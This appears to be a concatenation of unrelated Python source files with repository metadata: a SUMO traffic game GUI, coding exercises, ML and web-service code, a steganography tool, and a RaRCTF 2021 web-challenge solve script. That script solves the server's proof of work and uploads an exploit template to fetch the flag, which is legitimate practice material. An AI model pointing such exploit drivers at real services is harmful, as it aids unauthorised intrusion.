        self.addButton(button, 'quit')
        button.grid(row=numButtons - 1, column=COL_START, columnspan=2)

        button = Tkinter.Button(
            self, width=bWidth_control, command=lambda: self.change_language())
        self.addButton(button, 'lang')
        button.grid(row=numButtons - 2, column=COL_START, columnspan=2)

        self.grid()
        # The following three commands are needed so the window pops
        # up on top on Windows...
        self.parent.iconify()
        self.parent.update()
        self.parent.deiconify()

    def addButton(self, button, text):
        """Label the button for the current language and register it for
        relabeling on language change."""
        button["text"] = self._language_text.get(text, text)
        self.buttons.append((text, button))

    def change_language(self):
        """Toggle between German and English and relabel all buttons."""
        if self._language_text == _LANGUAGE_DE:
            self._language_text = _LANGUAGE_EN
        else:
            self._language_text = _LANGUAGE_DE
        for text, button in self.buttons:
            button["text"] = self._language_text[text]

    def category_name(self, cfg):
        """Scenario name = config file name without the '.sumocfg' suffix."""
        return os.path.basename(cfg)[:-8]

    def start_cfg(self, cfg):
        """Run one game with sumo-gui, score it and show the highscores."""
        # remember which which cfg was launched
        self.category = self.category_name(cfg)
        if _DEBUG:
            print("starting", cfg)
        self.gametime = parseEndTime(cfg)
        # blocks until the player closes sumo-gui
        self.ret = subprocess.call(
            [guisimPath, "-S", "-G", "-Q", "-c", cfg, '-l', 'log',
             '--output-prefix', "%s." % self.category,
             '--duration-log.statistics',
             '--tripinfo-output.write-unfinished'], stderr=sys.stderr)

        if _DEBUG:
            print("ended", cfg)

        # compute score
        score, totalArrived, complete = _SCORING_FUNCTION[self.category](self.category)

        # parse switches: record each traffic-light program change (id, time)
        switch = []
        lastProg = {}
        tlsfile = os.path.join(base, "%s.tlsstate.xml" % start.category)
        if os.path.exists(tlsfile):
            for line in open(tlsfile):
                m = re.search(r'tlsstate time="(\d+(.\d+)?)" id="([^"]*)" programID="([^"]*)"', line)
                if m:
                    tls = m.group(3)
                    program = m.group(4)
                    if tls not in lastProg or lastProg[tls] != program:
                        lastProg[tls] = program
                        switch += [m.group(3), m.group(1)]
        lang = start._language_text
        if _DEBUG:
            print(switch, score, totalArrived, complete)
        if complete:
            ScoreDialog(self, switch, score, self.category, lang)
        # if ret != 0:
        # quit on error
        # sys.exit(start.ret)


class ScoreDialog:
    """Highscore window; offers a name entry when the new score qualifies."""

    def __init__(self, parent, switch, score, category, lang):
        self.root = Tkinter.Toplevel(parent)
        # self.root.transient(parent)
        self.name = None
        self.switch = switch
        self.score = score
        self.category = category
        self.root.title(lang["Highscore"])
        self.root.minsize(250, 50)
        haveHigh = False

        if category not in high:
            high[category] = _SCORES * [("", "", -1.)]
        idx = 0
        for n, g, p in high[category]:
            # first entry the new score beats: insert the name-entry row here
            if not haveHigh and p < score:
                Tkinter.Label(
                    self.root, text=(str(idx + 1) + '. ')).grid(row=idx)
                self.name = Tkinter.Entry(self.root)
                self.name.grid(row=idx, sticky=Tkinter.W, column=1)
                self.scoreLabel = Tkinter.Label(self.root, text=str(score),
                                                bg="pale green").grid(row=idx, column=2)
                self.idx = idx
                haveHigh = True
                self.root.title(lang["Congratulations"])
                idx += 1
            # stop at the first sentinel entry or when the table is full
            if p == -1 or idx == _SCORES:
                break
            Tkinter.Label(self.root, text=(str(idx + 1) + '. ')).grid(row=idx)
            Tkinter.Label(self.root, text=n, padx=5).grid(
                row=idx, sticky=Tkinter.W, column=1)
            Tkinter.Label(self.root, text=str(p)).grid(row=idx, column=2)
            idx += 1
        if not haveHigh:
            if score is not None:  # not called from the main menue
                Tkinter.Label(self.root, text=lang['your score'], padx=5,
                              bg="indian red").grid(row=idx, sticky=Tkinter.W, column=1)
                Tkinter.Label(self.root, text=str(score),
                              bg="indian red").grid(row=idx, column=2)
                idx += 1
        Tkinter.Button(self.root, text=lang["Continue"], command=self.save).grid(
            row=idx, column=2)

        # add QR-code for LNDW
        Tkinter.Label(self.root, image=IMAGE.qrCode).grid(
            row=1, column=3, rowspan=22)

        self.root.grid()
        self.root.bind("<Return>", self.save)
        # self.root.wait_visibility()
        # self.root.grab_set()
        if self.name:
            self.name.focus_set()
        # The following three commands are needed so the window pops
        # up on top on Windows...
        # self.root.iconify()
        # self.root.update()
        # self.root.deiconify()
        # self.root.mainloop()

    def save(self, event=None):
        """Insert the entered name into the table, persist locally and
        (best-effort) upload to the score server, then close."""
        if self.name and self.name.get():
            name = self.name.get()
            high[self.category].insert(
                self.idx, (name, self.switch, self.score))
            high[self.category].pop()
            self.name.destroy()
            self.name = None
            Tkinter.Label(self.root, text=name, padx=5,
                          bg="pale green").grid(row=self.idx, sticky=Tkinter.W, column=1)
            # local persistence is best-effort
            try:
                f = open(_SCOREFILE, 'w')
                pickle.dump(high, f)
                f.close()
            except Exception:
                pass
            if _UPLOAD:
                printDebug("try to upload score...")
                try:
                    conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT)
                    conn.request("GET", _SCORESCRIPT + "category=%s&name=%s&instance=%s&points=%s" % (
                        self.category, name, "_".join(self.switch), self.score))
                    if _DEBUG:
                        r1 = conn.getresponse()
                        print(r1.status, r1.reason, r1.read())
                    printDebug("SUCCESS")
                except BaseException:
                    printDebug("FAILED")
        self.quit()

    def quit(self, event=None):
        self.root.destroy()


stereoModes = (
    'ANAGLYPHIC', 'QUAD_BUFFER', 'VERTICAL_SPLIT', 'HORIZONTAL_SPLIT')
optParser = OptionParser()
optParser.add_option("-s", "--stereo", metavar="OSG_STEREO_MODE",
                     help="Defines the stereo mode to use for 3D output; unique prefix of %s" % (
                         ", ".join(stereoModes)))
options, args = optParser.parse_args()

base = os.path.dirname(sys.argv[0])
high = loadHighscore()
guisimPath = sumolib.checkBinary("sumo-gui")
# 3D scenarios are offered only when sumo was built with OSG support
haveOSG = "OSG" in subprocess.check_output(sumolib.checkBinary("sumo"), universal_newlines=True)

if options.stereo:
    for m in stereoModes:
        if m.lower().startswith(options.stereo.lower()):
            os.environ["OSG_STEREO_MODE"] = m
            os.environ["OSG_STEREO"] = "ON"
            break

lang = _LANGUAGE_EN
# make the bundled 3D models findable for the OSG renderer
if "OSG_FILE_PATH" in os.environ:
    os.environ["OSG_FILE_PATH"] += os.pathsep + \
        os.path.join(os.environ.get("SUMO_HOME", ""), "data", "3D")
else:
    os.environ["OSG_FILE_PATH"] = os.path.join(
        os.environ.get("SUMO_HOME", ""), "data", "3D")

root = Tkinter.Tk()
IMAGE.dlrLogo = Tkinter.PhotoImage(file='dlr.gif')
IMAGE.sumoLogo = Tkinter.PhotoImage(file='sumo_logo.gif')
IMAGE.qrCode = Tkinter.PhotoImage(file='qr_sumo.dlr.de.gif')
start = StartDialog(root, lang)
root.mainloop()
36.35567
112
0.565622
c30b8b72f076c5457f9f0e8c230a44a9cc7a8e5f
1,044
py
Python
web/Electroplating/solve.py
NoXLaw/RaRCTF2021-Challenges-Public
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
[ "MIT" ]
null
null
null
web/Electroplating/solve.py
NoXLaw/RaRCTF2021-Challenges-Public
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
[ "MIT" ]
null
null
null
web/Electroplating/solve.py
NoXLaw/RaRCTF2021-Challenges-Public
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
[ "MIT" ]
null
null
null
import requests
import hashlib
import uuid
import binascii
import os
import sys


def generate():
    """Create a random (prefix, suffix) challenge pair (4 hex chars each)."""
    return uuid.uuid4().hex[:4], uuid.uuid4().hex[:4]


def verify(prefix, suffix, answer, difficulty=6):
    """Check whether sha256(prefix + answer + suffix) ends in `difficulty` zeros."""
    # NOTE(review): `hash` shadows the builtin of the same name; harmless
    # here since the builtin is not used in this scope.
    hash = hashlib.sha256(prefix.encode() + answer.encode() + suffix.encode()).hexdigest()
    return hash.endswith("0"*difficulty)


def solve(prefix, suffix, difficulty):
    """Brute-force a proof-of-work answer by trying random 8-hex-char tokens.

    Loops until verify() accepts; expected ~16^difficulty attempts, so this
    can take a while for difficulty 6.
    """
    while True:
        test = binascii.hexlify(os.urandom(4)).decode()
        if verify(prefix, suffix, test, difficulty):
            return test


# --- script entry: solve the server's PoW, then upload the exploit file ---
if len(sys.argv) < 2:
    print("Usage: solve.py http://host:port/")
    exit()

s = requests.Session()
host = sys.argv[1]
# fetch the proof-of-work challenge
data = s.get(host + "pow").json()
print("Solving POW")
solution = solve(data['pref'], data['suff'], 6)
print(f"Solved: {solution}")
s.post(host + "pow", json={"answer": solution})
# upload the exploit template; the commented line is the unmodified template
r = s.post(host, files={"file": open('solve.htmlrs', 'rb')})
# r = s.post(host, files={"file": open('src/template.htmlrs', 'rb')})
print(r.text)
# line 14 of the response is expected to contain the flag
try:
    print(r.text.split('\n')[14])
except:
    print("Blocked")
24.27907
90
0.644636
c351dec159890595ef75075c3943491ddc436720
892
py
Python
exercises/python/data-types/collections/default-dict.py
rogeriosantosf/hacker-rank-profile
d4b9c131524d138c415e5c5de4e38c6b8c35dd77
[ "MIT" ]
null
null
null
exercises/python/data-types/collections/default-dict.py
rogeriosantosf/hacker-rank-profile
d4b9c131524d138c415e5c5de4e38c6b8c35dd77
[ "MIT" ]
null
null
null
exercises/python/data-types/collections/default-dict.py
rogeriosantosf/hacker-rank-profile
d4b9c131524d138c415e5c5de4e38c6b8c35dd77
[ "MIT" ]
null
null
null
# In this challenge, you will be given 2 integers, m and n.
# There are n words, which might repeat, in word group A.
# There are m words belonging to word group B.
# For each m words, check whether the word has appeared in group A or not.
# Print the indices of each occurrence of m in group A.
# If it does not appear, print -1.

from collections import defaultdict


def word_positions(words):
    """Map each word to the list of its 1-based positions in ``words``.

    Building this index once replaces the original O(n*m) rescan of
    group A for every group-B query with a single O(n) pass.

    :param words: iterable of words (group A, in input order).
    :return: defaultdict mapping word -> [1-based indices].
    """
    positions = defaultdict(list)
    for index, word in enumerate(words, start=1):
        positions[word].append(index)
    return positions


if __name__ == '__main__':
    n, m = map(int, input().split())
    group_a = [input() for _ in range(n)]
    group_b = [input() for _ in range(m)]
    positions = word_positions(group_a)
    for word in group_b:
        if word in positions:
            print(" ".join(map(str, positions[word])))
        else:
            print("-1")
30.758621
75
0.571749
6f50f82050e54f4868ea22dbd8655476c4e1c5f4
1,619
py
Python
2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
1
2021-11-05T07:48:26.000Z
2021-11-05T07:48:26.000Z
""" Find the shortest path between two nodes in an unweighted undirected graph. Remember this is about finding the shortest path, not the shortest distance. For shortest distance you can simply calculate the level of nodes from the source vertex and that will give the answer. For shortest path, use the concept of parents of Bellman-Ford algorithm. Simply do a BFS and keep track of parents of each node. Then recursively print the parents of destination node until the source node. """ from collections import defaultdict class Graph: def __init__(self, vertices): self.vertices = vertices self.graph = defaultdict(list) def add_edge(self, u, v): self.graph[u].append(v) self.graph[v].append(u) def bfs(self, s): parent = [-1] * self.vertices visited = [False] * self.vertices visited[s] = True queue = [] queue.append(s) while queue: s = queue.pop(0) for i in self.graph[s]: if visited[i] == False: queue.append(i) parent[i] = s visited[i] = True return parent def shortest_path(self, source, dest): parent = self.bfs(source) while True: print(dest, end=' ') dest = parent[dest] if dest == source: break g = Graph(8) g.add_edge(0, 1) g.add_edge(0, 3) g.add_edge(1, 2) g.add_edge(3, 4) g.add_edge(3, 7) g.add_edge(4, 5) g.add_edge(4, 6) g.add_edge(4, 7) g.add_edge(5, 6) g.add_edge(6, 7) g.shortest_path(0, 7)
23.808824
89
0.594812
48cd470862b5566406b88bf33d5cc16654b91e0a
302
py
Python
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py
jaswinder9051998/Resources
fd468af37bf24ca57555d153ee64693c018e822e
[ "MIT" ]
101
2021-12-20T11:57:11.000Z
2022-03-23T09:49:13.000Z
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py
Sid-1164/Resources
3987dcaeddc8825f9bc79609ff26094282b8ece1
[ "MIT" ]
4
2022-01-12T11:55:56.000Z
2022-02-12T04:53:33.000Z
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py
Sid-1164/Resources
3987dcaeddc8825f9bc79609ff26094282b8ece1
[ "MIT" ]
38
2022-01-12T11:56:16.000Z
2022-03-23T10:07:52.000Z
""" 1. Write a function that accepts two integers num1 and num2. The function should divide num1 by num2 and return the quotient and remainder. The output can be rounded to 2 decimal places. """ def quot_rem(num1,num2): q = round((num1 / num2), 2) r = round((num1 % num2), 2) return (q,r)
30.2
100
0.68543
d28c7a51f180fe4d9711b5cf099c91ea2d70c774
580
py
Python
python/asyncio/tasks.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/asyncio/tasks.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/asyncio/tasks.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
import asyncio


async def my_task(seconds):
    """Announce itself, sleep for ``seconds``, then report completion."""
    print('This task is taking {} seconds to complete'.format(seconds))
    await asyncio.sleep(seconds)
    return 'task finished'


if __name__ == '__main__':
    # Drive the coroutine on an explicitly managed event loop, making sure
    # the loop is closed even if task creation or execution fails.
    loop = asyncio.get_event_loop()
    try:
        print('task creation started')
        task_obj = loop.create_task(my_task(seconds=2))
        loop.run_until_complete(task_obj)
    finally:
        loop.close()
    # The completed task still holds its result after the loop is closed.
    print("The task's result was: {}".format(task_obj.result()))
26.363636
71
0.668966
96050349c05924aa062803ddf5dd8d851a867f8b
5,081
py
Python
mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
1
2019-05-10T09:16:23.000Z
2019-05-10T09:16:23.000Z
mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
null
null
null
mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
1
2019-10-14T07:30:18.000Z
2019-10-14T07:30:18.000Z
""" Simple Translate CLI """ from contextlib import ExitStack import mxnet as mx import sys import argparse import logging import time import sockeye.utils from sockeye.utils import acquire_gpu, get_num_gpus import sockeye.data_io import sockeye.arguments as arguments import sockeye.inference import re import numpy as np def main(): params = argparse.ArgumentParser(description='Translate from STDIN to STDOUT') params.add_argument('--model-prefixes', '-m', required=False, nargs='+', help='model prefix(es). Use multiple for ensemble decoding. ' + 'Model prefix determines config, best epoch params and vocab files.') params.add_argument('--epochs', '-e', required=False, default=None, type=int, nargs='+', help='If not given, chooses best epochs/checkpoints for each model. If specified, must have the same ' + 'length as --model-prefix and be integer') params.add_argument('--max-input-len', '-n', type=int, default=None, help='Maximum sentence length. Default: value from trained model(s).') params.add_argument('--output-type', default='translation', choices=["translation", "align_plot", "align_text"], help='Either print the translation or visualize the alignment. Default: translation') params.add_argument('--align-plot-prefix', default="align", help='Prefix used when plotting the alignment.') params.add_argument('--log-level', default=logging.INFO, type=int, choices=[logging.INFO, logging.WARN, logging.DEBUG]) params.add_argument('--beam-size', '-b', type=int, default=1, help='beam size. If == 1, greedy decode') params.add_argument('--ensemble-mode', type=str, default='linear', choices=['linear', 'log_linear'], help='Ensemble mode: linear or log-linear interpolation of model predictions. Default: linear') params.add_argument('--softmax-temperature', type=float, default=None, required=False, help='Controls peakiness of model predictions. 
Values < 1.0 produce peaked predictions, ' + 'values > 1.0 produce smoothed distributions.') params = arguments.add_device_args(params) args = params.parse_args() args.model_prefixes = ['model/'] assert args.beam_size > 0, "Beam size must be 1 or greater." if args.epochs is not None: assert len(args.epochs) == len(args.model_prefixes), "must provide epochs for each model" #sockeye.utils.setup_logging(args.log_level) logging.basicConfig(filename='test.log', level=logging.INFO) logging.info("Command: %s", " ".join(sys.argv)) logging.info("Arguments: %s", args) with ExitStack() as exit_stack: if args.use_cpu: context = mx.cpu() else: num_gpus = get_num_gpus() assert num_gpus > 0, "No GPUs found, consider running on the CPU with --use-cpu " \ "(note: check depends on nvidia-smi and this could also mean that the nvidia-smi " \ "binary isn't on the path)." assert len(args.device_ids) == 1, "cannot run on multiple devices for now" gpu_id = args.device_ids[0] if gpu_id < 0: # get an automatic gpu id: gpu_id = exit_stack.enter_context(acquire_gpu()) context = mx.gpu(gpu_id) translator = sockeye.inference.Translator(context, args.ensemble_mode, *sockeye.inference.load_models(context, args.max_input_len, args.beam_size, args.model_prefixes, args.epochs, args.softmax_temperature)) ############ CHANGE HERE ######################## sample_file = open('train_question_token.txt','r') encoder_file = open('train_question_encoder.txt', "w") ################################################# for i, line in enumerate(sample_file,1): trans_input = translator.make_input(i,line) source, source_length, bucket_key = translator._get_inference_input(trans_input.tokens) encoded_source, _ , _ , _, _ = translator.models[0].run_encoder(source, source_length, bucket_key) last_slice_source = mx.ndarray.mean(encoded_source, axis=1, keepdims=True) last_slice_source = last_slice_source.reshape((-1,)) encoder_file.write(" ".join(map(str, last_slice_source.asnumpy()))+"\n") encoder_file.close() if 
__name__ == '__main__': main()
51.846939
128
0.571147
7dc2a90ba4547195588f251869e654e8a1c3535b
2,552
py
Python
plugins/tff_backend/models/payment.py
threefoldfoundation/app_backend
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
[ "Apache-2.0" ]
null
null
null
plugins/tff_backend/models/payment.py
threefoldfoundation/app_backend
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
[ "Apache-2.0" ]
178
2017-08-02T12:58:06.000Z
2017-12-20T15:01:12.000Z
plugins/tff_backend/models/payment.py
threefoldfoundation/app_backend
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
[ "Apache-2.0" ]
2
2018-01-10T10:43:12.000Z
2018-03-18T10:42:23.000Z
# -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
from google.appengine.ext import ndb

from framework.models.common import NdbModel
from plugins.tff_backend.plugin_consts import NAMESPACE


class ThreeFoldBaseTransaction(NdbModel):
    """Fields shared by confirmed (ThreeFoldTransaction) and pending
    (ThreeFoldPendingTransaction) token transactions."""
    NAMESPACE = NAMESPACE
    timestamp = ndb.IntegerProperty()
    # Presumably parallel lists (unlock_amounts[i] unlocks at
    # unlock_timestamps[i]) — TODO confirm against writer code.
    unlock_timestamps = ndb.IntegerProperty(repeated=True, indexed=False)  # type: list[int]
    unlock_amounts = ndb.IntegerProperty(repeated=True, indexed=False)  # type: list[int]
    token = ndb.StringProperty()
    token_type = ndb.StringProperty()
    amount = ndb.IntegerProperty()
    precision = ndb.IntegerProperty(default=2)
    memo = ndb.StringProperty()
    usernames = ndb.StringProperty(repeated=True)
    from_username = ndb.StringProperty()
    to_username = ndb.StringProperty()


class ThreeFoldTransaction(ThreeFoldBaseTransaction):
    """A transaction that tracks how much of its amount is still spendable."""
    amount_left = ndb.IntegerProperty()
    fully_spent = ndb.BooleanProperty()
    height = ndb.IntegerProperty()

    @property
    def id(self):
        # Integer datastore id of this entity.
        return self.key.id()

    @classmethod
    def create_new(cls):
        return cls(namespace=NAMESPACE)

    @classmethod
    def list_with_amount_left(cls, username):
        # Not-fully-spent transactions received by `username`, newest first.
        # `== False` (not `is False`) is how ndb builds query filters.
        return cls.query() \
            .filter(cls.to_username == username) \
            .filter(cls.fully_spent == False) \
            .order(-cls.timestamp)  # noQA


class ThreeFoldPendingTransaction(ThreeFoldBaseTransaction):
    """A transaction that has not (yet) been confirmed."""
    STATUS_PENDING = u'pending'
    STATUS_CONFIRMED = u'confirmed'
    STATUS_FAILED = u'failed'

    synced = ndb.BooleanProperty()
    synced_status = ndb.StringProperty()

    @property
    def id(self):
        # NOTE(review): assumes key.string_id() returns bytes that need
        # decoding — on Python 2 ndb this is a str; confirm runtime.
        return self.key.string_id().decode('utf8')

    @classmethod
    def create_key(cls, transaction_id):
        return ndb.Key(cls, u"%s" % transaction_id, namespace=NAMESPACE)

    @classmethod
    def list_by_user(cls, username):
        # Every transaction that involves `username`, newest first.
        return cls.query() \
            .filter(cls.usernames == username) \
            .order(-cls.timestamp)
31.506173
92
0.704154
4858b0ab221bd6fcbedef2394043bc190ecf5a5e
983
py
Python
Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
null
null
null
Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
40
2022-03-03T07:34:00.000Z
2022-03-31T07:38:35.000Z
Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
null
null
null
from DuoEventCollector import Client, GetEvents, LogType, Params

# Integration parameters in the shape demisto supplies them (keys/secrets are
# dummy values).
demisto_params = {'after': '1 month', 'host': 'api-a1fdb00d.duosecurity.com', 'integration_key': 'DI47EXXXXXXXWRYV2',
                  'limit': '5', 'proxy': False, 'retries': '5',
                  'secret_key': {'password': 'YK6mtSzXXXXXXXXXXX', 'passwordChanged': False}}
demisto_params['params'] = Params(**demisto_params, mintime={})
client = Client(demisto_params)
# Module-level collector shared by the test below; its request_order starts as
# [AUTHENTICATION, ADMINISTRATION, TELEPHONY].
get_events = GetEvents(client=client, request_order=[LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY])


def test_rotate_request_order():
    # One rotation moves the head log type to the back of the list.
    get_events.rotate_request_order()
    assert get_events.request_order == [LogType.ADMINISTRATION, LogType.TELEPHONY, LogType.AUTHENTICATION]
    # Two more rotations complete the cycle back to the original order.
    get_events.rotate_request_order()
    get_events.rotate_request_order()
    assert get_events.request_order == [LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY]
57.823529
120
0.699898
d21059497ff56cda89a8d1b389c15c04c01fa702
2,773
py
Python
src/api/light.py
th-koeln-intia/ip-sprachassistent-team1
69fbc06a326da91fd3d84f222eba6cd2b1a79975
[ "MIT" ]
1
2021-04-28T09:45:34.000Z
2021-04-28T09:45:34.000Z
src/api/light.py
th-koeln-intia/ip-sprachassistent-team1
69fbc06a326da91fd3d84f222eba6cd2b1a79975
[ "MIT" ]
1
2020-09-24T07:20:16.000Z
2020-09-24T07:20:16.000Z
src/api/light.py
th-koeln-intia/ip-sprachassistent-team1
69fbc06a326da91fd3d84f222eba6cd2b1a79975
[ "MIT" ]
1
2020-12-04T13:38:33.000Z
2020-12-04T13:38:33.000Z
from api.app import app
from api import MQTT_HOST, MQTT_PORT
from flask import request, Response, jsonify
import json
import paho.mqtt.publish as publish
from json import JSONDecoder, JSONEncoder


@app.route('/light/set', methods=['POST'])
def set_light():
    # Set a light from a structured JSON body:
    # {"friendly_name": ..., "payload": {...}, "feedback": ...}
    body = request.get_json()
    if body is None or 'friendly_name' not in body or 'payload' not in body:
        return jsonify({"error": "BAD_REQUEST"}), 400
    else:
        publish_set(body['friendly_name'], json.dumps(body['payload']))
        # NOTE(review): 'feedback' is not validated above, so a body without
        # it raises KeyError (HTTP 500) — confirm callers always send it.
        publish_feedback(json.dumps(body['feedback']))
        return json.dumps(body), 200


@app.route('/light/set/raw', methods=['POST'])
def set_light_raw():
    # Set a light from a raw Rhasspy intent payload; the target lamp and the
    # state/brightness/color values are extracted from the intent entities.
    body = request.get_json()
    if body is None:
        return jsonify({"error": "BAD_REQUEST"}), 400
    friendly_name = get_friendly_name_from_rhasspy_intent(body)
    payload = create_payload_from_rhasspy_intent(body)
    publish_set(friendly_name, json.dumps(payload))
    # Echo the recognized text back through TTS as confirmation.
    raw_text = get_raw_text_as_payload(body)
    publish_feedback(json.dumps(raw_text))
    return json.dumps(body), 200


def create_payload_from_rhasspy_intent(dict):
    # NOTE(review): parameter shadows the builtin `dict`; kept for
    # compatibility.  Builds a zigbee2mqtt payload from intent entities,
    # including only the keys that are present.
    entities = dict.get('entities', None)
    if entities is None:
        return None
    state = next((x for x in entities if x['entity'] == 'state'), None)
    brightness = next((x for x in entities if x['entity'] == 'brightness'), None)
    color = next((x for x in entities if x['entity'] == 'color'), None)
    payload = {}
    if state is not None and 'value' in state:
        payload['state'] = state['value']
    if brightness is not None and 'value' in brightness:
        payload['brightness'] = brightness['value']
    if color is not None and 'value' in color:
        payload['color'] = color['value']
    return payload


def get_friendly_name_from_rhasspy_intent(dict):
    # Returns the 'room' entity's value, used as the device friendly name.
    entities = dict.get('entities', None)
    if entities is None:
        return None
    room = next((e for e in entities if e['entity'] == 'room'), None)
    # NOTE(review): if no 'room' entity exists, `room` is None and .get
    # raises AttributeError — confirm intents always carry a room.
    return room.get('value', None)


def publish_set(friendly_name, payload):
    # Publish a state-change command for the named zigbee2mqtt device.
    topic = 'zigbee2mqtt/' + friendly_name + '/set'
    publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT)


def publish_feedback(payload):
    # Publish spoken feedback via the Hermes TTS topic.
    topic = 'hermes/tts/say'
    publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT)


def get_raw_value_from_room_entity(dict):
    # Like get_friendly_name_from_rhasspy_intent, but returns the raw
    # (unsubstituted) recognized value of the 'room' entity.
    entities = dict.get('entities', None)
    if entities is None:
        return None
    room = next((e for e in entities if e['entity'] == 'room'), None)
    return room.get('raw_value', None)


def get_raw_text_as_payload(dict):
    # Wrap the intent's raw recognized text in a TTS payload, prefixed with
    # a confirmation word.
    payload = {}
    payload['text'] = dict.get('raw_text', None)
    if(payload['text'] is not None):
        payload['text'] = 'Okay, ' + payload['text']
    print(json.dumps(payload))
    return payload
33.817073
81
0.673639
d27ffe7a1e06854e2ba699eea5d81dfb4945c148
1,901
py
Python
Steg2.py
Han-Lon/Steganosimple-Cryptor
8fb10993d51250fdfe25f02311f7143af21e8085
[ "MIT" ]
null
null
null
Steg2.py
Han-Lon/Steganosimple-Cryptor
8fb10993d51250fdfe25f02311f7143af21e8085
[ "MIT" ]
null
null
null
Steg2.py
Han-Lon/Steganosimple-Cryptor
8fb10993d51250fdfe25f02311f7143af21e8085
[ "MIT" ]
null
null
null
from stegano import lsb
from tkinter import filedialog

# A personal project to try out steganography: hiding data inside image files
# (e.g. in unused bits) without visibly changing the image.


def hide(message, image, output):
    """Embed `message` into `image` using the LSB method and save to `output`."""
    lsb.hide(image, message).save(output)


def reveal(image):
    """Return the LSB-hidden message in `image`; print an error (and return
    None) when the image carries no hidden message."""
    try:
        revealed = str.encode(lsb.reveal(image))
        return str(revealed, encoding='utf-8')
    except TypeError:
        print('ERROR! Image doesn\'t seem to have any hidden message.')


if __name__ == '__main__':
    looper = True
    while looper:
        # Minimal CLI menu; any answer other than 1/2 exits.
        operation = input('Enter an operation - 1. Hide 2. Reveal \n')
        if operation == '1':
            print('Hide data option selected...')
            # Embed a typed message into a user-chosen image file.
            message = input('\n Enter a message! \n')
            img_input = filedialog.askopenfilename()
            base = img_input.split('.')[0]
            output_path = base + '1' + '.png'
            hide(message, img_input, output_path)
            print('Message has been hidden in {}'.format(output_path))
        elif operation == '2':
            # Extract whatever is hidden in a user-chosen image file.
            print('Reveal data option selected...')
            img_input = filedialog.askopenfilename()
            output = reveal(img_input)
            print('Data hidden in the image file: {}'.format(output))
        else:
            looper = False
            break
37.27451
117
0.634929
96714247c993e41c5762d3e61ed42c474feb4d08
2,136
py
Python
.arch/plugins/doc_lcdoc/serve.py
axiros/docutools
f99874a64afba8f5bc740049d843151ccd9ceaf7
[ "BSD-2-Clause" ]
24
2021-10-04T22:11:59.000Z
2022-02-02T21:51:43.000Z
.arch/plugins/doc_lcdoc/serve.py
axiros/docutools
f99874a64afba8f5bc740049d843151ccd9ceaf7
[ "BSD-2-Clause" ]
2
2021-10-04T21:51:30.000Z
2021-10-05T14:15:31.000Z
.arch/plugins/doc_lcdoc/serve.py
axiros/docutools
f99874a64afba8f5bc740049d843151ccd9ceaf7
[ "BSD-2-Clause" ]
null
null
null
